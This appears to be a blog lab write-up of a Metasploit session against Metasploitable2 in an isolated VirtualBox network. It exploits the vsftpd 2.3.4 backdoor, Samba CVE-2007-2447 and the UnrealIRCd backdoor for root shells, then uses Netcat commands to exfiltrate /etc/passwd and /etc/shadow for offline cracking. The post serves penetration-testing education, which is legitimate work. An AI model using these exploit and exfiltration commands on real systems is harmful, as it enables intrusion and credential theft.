Scanning a network and listing open ports is useful. Actually exploiting those ports and landing
a root shell — that is where exploitation begins. In this write-up I walk through a full Metasploit
session against Metasploitable2: setting up the framework with a PostgreSQL backend, running
a database-backed Nmap scan, exploiting three separate vulnerabilities (vsftpd, Samba, and
UnrealIRCd), exfiltrating credential files over Netcat, and understanding exactly why each
vulnerability works.
Everything here was run in an isolated VirtualBox lab. No external systems were touched.
The Problem This Solves
You have enumerated a target and you have a service list. Now what? Knowing that port 21 runs
vsftpd 2.3.4 is one thing. Knowing that vsftpd 2.3.4 ships with a compiled-in backdoor — and
being able to trigger it in three commands — is something else entirely. This post covers the full
path from service discovery to root shell across three different attack surfaces.
Lab Environment
| Machine | Role | IP Address |
|---|---|---|
| Kali Linux 2026.1 | Attacker | 192.168.1.4 |
| Metasploitable2 | Target | 192.168.1.3 |
Network: 192.168.1.0/24 — fully isolated NAT network inside VirtualBox.
Step 1 — Setting Up Metasploit with a Database Backend
Metasploit stores scan results, hosts, services, and vulnerabilities in a PostgreSQL database.
Getting this set up correctly before starting means all your Nmap results persist between
sessions and you can query them inside msfconsole.
# Start PostgreSQL
sudo systemctl start postgresql
# Initialize the Metasploit database (one time only)
sudo msfdb init
# Launch Metasploit
msfconsole
Once inside msfconsole:
# Verify database connection
msf6> db_status
# [*] Connected to msf. Connection type: postgresql.
# Create a workspace for this session
msf6> workspace -a 178-metasploitable2
# Confirm the workspace is active
msf6> workspace
Now run a full Nmap scan directly from within Metasploit. The db_nmap command runs Nmap
and automatically saves all results to the database.
msf6> db_nmap -A 192.168.1.0/24 -n
After the scan completes, query the results:
msf6> hosts # List all discovered hosts
msf6> services # List all discovered services
Two FTP servers were found running on Metasploitable2:
| Port | Service | Info |
|---|---|---|
| 21/tcp | ftp | vsftpd 2.3.4 |
| 2121/tcp | ftp | ProFTPD 1.3.1 |
The full services table also revealed SSH, Telnet, SMTP, HTTP, MySQL, PostgreSQL, VNC,
Samba (on 139 and 445), IRC on 6667, and a Metasploitable root shell on 1524 — a deliberately
over-exposed machine.
Step 2 — Exploiting vsftpd 2.3.4 (Backdoor Command Execution)
The Vulnerability
In July 2011, someone compromised the vsftpd 2.3.4 download mirror and inserted a malicious
backdoor into the source archive. The backdoor is simple and elegant in a malicious way: if the
FTP username contains a :) smiley face character, the server opens a TCP callback shell on
port 6200. The code diff is documented at https://pastebin.com/AetT9sS5.
Finding the Exploit
msf6> search type:exploit name:vsftpd
One result came back:
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes
Running the Exploit
msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info
msf6> show options
# Required options: RHOSTS, RPORT
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit
The exploit triggered the backdoor and opened a Meterpreter session. Dropping to a shell:
meterpreter> shell
whoami
# root
uname -a
# Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Extracting the Shadow File
With root access, the /etc/shadow file — which stores hashed user passwords — is readable:
cat /etc/shadow | grep '$1'
This outputs the MD5-hashed ($1$) passwords for all accounts that have a password set.
The hash format is $1$<salt>$<hash> — crackable offline with tools like John the Ripper or
Hashcat.
Step 3 — Exploiting Samba (CVE-2007-2447)
The Vulnerability
The Samba username map script configuration option — present in versions 3.0.0 through
3.0.25rc3 — allows shell meta-characters in the username field to be passed directly to
/bin/sh. No authentication is required because the username is processed before
authentication occurs. This is CVE-2007-2447, and Metasploitable2 runs Samba 3.0.20-Debian.
msf6> search type:exploit name:samba
# Returns ~7 Samba exploits
msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> set RHOSTS 192.168.1.3
msf6> exploit
whoami
# root
smbd --version
# Version 3.0.20-Debian
Exfiltrating Credential Files with Netcat
With shell access via the Samba exploit, I used Netcat to pull /etc/passwd and /etc/shadow
off the target cleanly — no copy-paste, just piped data over TCP.
On Kali (Tab 2 — listening):
nc -l -p 4567 > passwd.txt
On the exploit shell (Tab 1 — sending):
cat /etc/passwd | nc 192.168.1.4 4567
Kill the listener with CTRL-C and verify the file arrived:
cat passwd.txt
Repeat for /etc/shadow:
# Tab 2
nc -l -p 4567 > shadow.txt
# Tab 1 (exploit shell)
cat /etc/shadow | nc 192.168.1.4 4567
Then merge both files with unshadow for offline cracking:
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt
The unshadow command combines the username/home directory fields from /etc/passwd with
the hash fields from /etc/shadow into a single format that password crackers like John the
Ripper can consume directly.
Step 4 — Exploiting UnrealIRCd 3.2.8.1 (Backdoor)
The Vulnerability
UnrealIRCd 3.2.8.1 was distributed with a deliberate backdoor inserted into its source code.
When the character sequence AB is sent to the IRC port (6667), the server executes any
command that follows it with root privileges — no authentication, no handshake. This is
identical in concept to the vsftpd backdoor: a supply-chain compromise of the software
distribution itself.
Finding and Running the Exploit
msf6> search type:exploit name:unreal
# Found: exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit
whoami
# root
uname -a
# Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Required options for this exploit:
| Option | Value | Description |
|---|---|---|
| RHOSTS | 192.168.1.3 | Target IP |
| RPORT | 6667 | IRC default port |
| LHOST | 192.168.1.4 | Kali listener IP |
| payload | cmd/unix/bind_netcat | Bind shell via Netcat |
Three exploits. Three root shells. Same target, different attack surfaces.
How Metasploit's Workflow Connects
One thing that becomes clear when running these exploits back to back is how Metasploit is
designed as a pipeline, not just a collection of scripts.
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell
Each stage feeds the next. The database stores your scan results so you are not re-running
Nmap every time you switch exploits. Workspaces keep different engagements isolated.
search filters by type, name, platform, CVE, rank — whatever is useful. info gives you the
full context before you commit to running anything.
How to Verify Your Results
| Check | Command |
|---|---|
| Confirm database connection | msf6> db_status |
| List discovered services | msf6> services |
| Verify vsftpd version | msf6> services -S ftp |
| Confirm Samba version post-exploit |
smbd --version on remote shell |
| Verify root access |
whoami on remote shell |
| Check kernel version |
uname -a on remote shell |
| Verify exfiltrated file |
wc -l passwd.txt — should match /etc/passwd line count |
What I Learned
Supply-chain attacks are not new. Both vsftpd 2.3.4 and UnrealIRCd 3.2.8.1 were
compromised at the distribution level — malicious code was baked into the official download.
Users who verified package signatures would have caught this; most did not. The pattern is
identical to modern supply-chain incidents, just from 2011 and earlier.
No authentication needed does not mean no access. CVE-2007-2447 in Samba processes
the username before authentication happens. The exploit fires before Samba even checks
credentials. This means patching is the only mitigation — there is no authentication control that
stops it.
Netcat is still one of the most useful tools in the kit. No GUI, no protocol overhead, no
dependencies. cat file | nc ip port for exfiltration and nc -l -p port > file for receiving is
a pattern that works across almost every Unix system regardless of what else is installed.
Metasploit is a framework, not a button. The power is in understanding what each module
does, what CVE it maps to, and what options it requires — not just typing exploit and hoping.
Running info before exploit should be a habit.
Common Mistakes
| Mistake | What Happens | Fix |
|---|---|---|
Skipping msfdb init
|
msfconsole launches but has no database — scan results are not saved | Run sudo msfdb init once before first use |
Not setting LHOST
|
Reverse shell has nowhere to connect back to | Always set LHOST to your Kali IP for reverse payloads |
Running msfdb init every session |
Overwrites existing data | Run it once only; use sudo msfdb status to check |
| Using wrong RPORT | Exploit sends payload to wrong port and fails silently | Confirm port from services output before setting |
| Closing the Netcat listener too early | Partial file transfer, truncated output | Wait a moment after the pipe command before CTRL-C |
Not running unshadow before cracking |
Password crackers need combined format | Always merge passwd + shadow before attempting cracks |
Conclusion
Three exploits, three root shells, two credential files exfiltrated, and one clear picture of how
Metasploit operates as a framework. The vsftpd backdoor triggers on a smiley face in the
username. The Samba usermap_script flaw passes shell meta-characters straight to /bin/sh
before authentication. The UnrealIRCd backdoor executes commands as root the moment it sees
AB on the wire.
All three vulnerabilities have one thing in common: they were not found through fuzzing or
memory corruption. They were backdoors — intentional, inserted at the source, and effective
until someone noticed. That context matters when thinking about software supply chains today.
Top comments (0)